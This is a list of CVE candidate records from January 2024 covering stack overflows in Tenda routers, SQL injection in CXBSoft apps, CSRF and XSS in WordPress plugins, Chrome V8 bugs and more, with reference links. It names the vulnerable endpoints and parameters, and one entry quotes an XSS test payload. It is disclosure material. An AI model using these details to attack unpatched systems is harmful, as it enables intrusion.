CVE    2024    540    Candidate    A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. Affected is the function formOfflineSet of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md   |   MISC:https://vuldb.com/?ctiid.250710   |   URL:https://vuldb.com/?ctiid.250710   |   MISC:https://vuldb.com/?id.250710   |   URL:https://vuldb.com/?id.250710    Assigned (20240114)
CVE    2024    539    Candidate    A vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md   |   MISC:https://vuldb.com/?ctiid.250709   |   URL:https://vuldb.com/?ctiid.250709   |   MISC:https://vuldb.com/?id.250709   |   URL:https://vuldb.com/?id.250709    Assigned (20240114)
CVE    2024    538    Candidate    A vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md   |   MISC:https://vuldb.com/?ctiid.250708   |   URL:https://vuldb.com/?ctiid.250708   |   MISC:https://vuldb.com/?id.250708   |   URL:https://vuldb.com/?id.250708    Assigned (20240114)
CVE    2024    537    Candidate    A vulnerability, which was classified as critical, was found in Tenda W9 1.0.0.7(4456). This affects the function setWrlBasicInfo of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md   |   MISC:https://vuldb.com/?ctiid.250707   |   URL:https://vuldb.com/?ctiid.250707   |   MISC:https://vuldb.com/?id.250707   |   URL:https://vuldb.com/?id.250707    Assigned (20240114)
CVE    2024    536    Candidate    A vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md   |   MISC:https://vuldb.com/?ctiid.250706   |   URL:https://vuldb.com/?ctiid.250706   |   MISC:https://vuldb.com/?id.250706   |   URL:https://vuldb.com/?id.250706    Assigned (20240114)
CVE    2024    535    Candidate    A vulnerability classified as critical was found in Tenda PA6 1.0.1.21. Affected by this vulnerability is the function cgiPortMapAdd of the file /portmap of the component httpd. The manipulation of the argument groupName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250705 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md   |   MISC:https://vuldb.com/?ctiid.250705   |   URL:https://vuldb.com/?ctiid.250705   |   MISC:https://vuldb.com/?id.250705   |   URL:https://vuldb.com/?id.250705    Assigned (20240114)
CVE    2024    534    Candidate    A vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md   |   MISC:https://vuldb.com/?ctiid.250704   |   URL:https://vuldb.com/?ctiid.250704   |   MISC:https://vuldb.com/?id.250704   |   URL:https://vuldb.com/?id.250704    Assigned (20240114)
CVE    2024    533    Candidate    A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md   |   MISC:https://vuldb.com/?ctiid.250703   |   URL:https://vuldb.com/?ctiid.250703   |   MISC:https://vuldb.com/?id.250703   |   URL:https://vuldb.com/?id.250703    Assigned (20240114)
CVE    2024    532    Candidate    A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md   |   MISC:https://vuldb.com/?ctiid.250702   |   URL:https://vuldb.com/?ctiid.250702   |   MISC:https://vuldb.com/?id.250702   |   URL:https://vuldb.com/?id.250702    Assigned (20240114)
CVE    2024    531    Candidate    A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md   |   MISC:https://vuldb.com/?ctiid.250701   |   URL:https://vuldb.com/?ctiid.250701   |   MISC:https://vuldb.com/?id.250701   |   URL:https://vuldb.com/?id.250701    Assigned (20240114)
CVE    2024    530    Candidate    A vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/HUxa372VNwad   |   URL:https://note.zhaoj.in/share/HUxa372VNwad   |   MISC:https://vuldb.com/?ctiid.250700   |   URL:https://vuldb.com/?ctiid.250700   |   MISC:https://vuldb.com/?id.250700   |   URL:https://vuldb.com/?id.250700    Assigned (20240114)
CVE    2024    529    Candidate    A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/neURUa2NSxzd   |   URL:https://note.zhaoj.in/share/neURUa2NSxzd   |   MISC:https://vuldb.com/?ctiid.250699   |   URL:https://vuldb.com/?ctiid.250699   |   MISC:https://vuldb.com/?id.250699   |   URL:https://vuldb.com/?id.250699    Assigned (20240114)
CVE    2024    528    Candidate    A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/grOgvdMgn0wg   |   URL:https://note.zhaoj.in/share/grOgvdMgn0wg   |   MISC:https://vuldb.com/?ctiid.250698   |   URL:https://vuldb.com/?ctiid.250698   |   MISC:https://vuldb.com/?id.250698   |   URL:https://vuldb.com/?id.250698    Assigned (20240114)
CVE    2024    527    Candidate    A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/6bz65C2dfgUk   |   URL:https://note.zhaoj.in/share/6bz65C2dfgUk   |   MISC:https://vuldb.com/?ctiid.250697   |   URL:https://vuldb.com/?ctiid.250697   |   MISC:https://vuldb.com/?id.250697   |   URL:https://vuldb.com/?id.250697    Assigned (20240114)
CVE    2024    526    Candidate    A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/Zezf8fmoq7lk   |   URL:https://note.zhaoj.in/share/Zezf8fmoq7lk   |   MISC:https://vuldb.com/?ctiid.250696   |   URL:https://vuldb.com/?ctiid.250696   |   MISC:https://vuldb.com/?id.250696   |   URL:https://vuldb.com/?id.250696    Assigned (20240114)
CVE    2024    525    Candidate    A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/9tjcunCPidgI   |   URL:https://note.zhaoj.in/share/9tjcunCPidgI   |   MISC:https://vuldb.com/?ctiid.250695   |   URL:https://vuldb.com/?ctiid.250695   |   MISC:https://vuldb.com/?id.250695   |   URL:https://vuldb.com/?id.250695    Assigned (20240114)
CVE    2024    524    Candidate    A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/GdpwiaItePFq   |   URL:https://note.zhaoj.in/share/GdpwiaItePFq   |   MISC:https://vuldb.com/?ctiid.250694   |   URL:https://vuldb.com/?ctiid.250694   |   MISC:https://vuldb.com/?id.250694   |   URL:https://vuldb.com/?id.250694    Assigned (20240114)
CVE    2024    523    Candidate    A vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md   |   URL:https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md   |   MISC:https://vuldb.com/?ctiid.250693   |   URL:https://vuldb.com/?ctiid.250693   |   MISC:https://vuldb.com/?id.250693   |   URL:https://vuldb.com/?id.250693    Assigned (20240114)
CVE    2024    522    Candidate    A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.    MISC:https://vuldb.com/?ctiid.250692   |   URL:https://vuldb.com/?ctiid.250692   |   MISC:https://vuldb.com/?id.250692   |   URL:https://vuldb.com/?id.250692    Assigned (20240114)
CVE    2024    521    Candidate    Code Injection in paddlepaddle/paddle    MISC:https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453   |   URL:https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453    Assigned (20240114)
CVE    2024    519    Candidate    Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-049f068a8c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/   |   FEDORA:FEDORA-2024-44b1f656a3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   MISC:https://crbug.com/1517354   |   URL:https://crbug.com/1517354    Assigned (20240112)
CVE    2024    518    Candidate    Type confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-049f068a8c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/   |   FEDORA:FEDORA-2024-44b1f656a3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   MISC:https://crbug.com/1507412   |   URL:https://crbug.com/1507412    Assigned (20240112)
CVE    2024    517    Candidate    Out of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-049f068a8c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/   |   FEDORA:FEDORA-2024-44b1f656a3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html   |   MISC:https://crbug.com/1515930   |   URL:https://crbug.com/1515930    Assigned (20240112)
CVE    2024    516    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to unauthorized post metadata update due to a missing capability check on the wpr_update_form_action_meta function in all versions up to, and including, 1.3.87. This makes it possible for unauthenticated attackers to update certain metadata.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve    Assigned (20240112)
CVE    2024    515    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_compare function. This makes it possible for unauthenticated attackers to remove items from user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve    Assigned (20240112)
CVE    2024    514    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_compare function. This makes it possible for unauthenticated attackers to add items to user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve    Assigned (20240112)
CVE    2024    513    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_wishlist function. This makes it possible for unauthenticated attackers to remove items from user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve    Assigned (20240112)
CVE    2024    512    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_wishlist function. This makes it possible for unauthenticated attackers to add items to user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve    Assigned (20240112)
CVE    2024    511    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve    Assigned (20240112)
CVE    2024    510    Candidate    A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.    MISC:https://note.zhaoj.in/share/gBtNhBb39u9u   |   URL:https://note.zhaoj.in/share/gBtNhBb39u9u   |   MISC:https://vuldb.com/?ctiid.250652   |   URL:https://vuldb.com/?ctiid.250652   |   MISC:https://vuldb.com/?id.250652   |   URL:https://vuldb.com/?id.250652    Assigned (20240112)
CVE    2024    509    Candidate    The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php   |   URL:https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve    Assigned (20240112)
CVE    2024    508    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010   |   URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010   |   MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019   |   URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019   |   MISC:https://plugins.trac.wordpress.org/changeset/3021959/   |   URL:https://plugins.trac.wordpress.org/changeset/3021959/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve    Assigned (20240112)
CVE    2024    507    Candidate    An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8    Assigned (20240112)
CVE    2024    506    Candidate    The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119   |   URL:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119   |   MISC:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381   |   URL:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381   |   MISC:https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php   |   URL:https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve    Assigned (20240112)
CVE    2024    505    Candidate    A vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619.    MISC:https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md   |   URL:https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md   |   MISC:https://vuldb.com/?ctiid.250619   |   URL:https://vuldb.com/?ctiid.250619   |   MISC:https://vuldb.com/?id.250619   |   URL:https://vuldb.com/?id.250619    Assigned (20240112)
CVE    2024    504    Candidate    A vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing   |   URL:https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250618   |   URL:https://vuldb.com/?ctiid.250618   |   MISC:https://vuldb.com/?id.250618   |   URL:https://vuldb.com/?id.250618    Assigned (20240112)
CVE    2024    503    Candidate    A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.    MISC:https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing   |   URL:https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250611   |   URL:https://vuldb.com/?ctiid.250611   |   MISC:https://vuldb.com/?id.250611   |   URL:https://vuldb.com/?id.250611    Assigned (20240112)
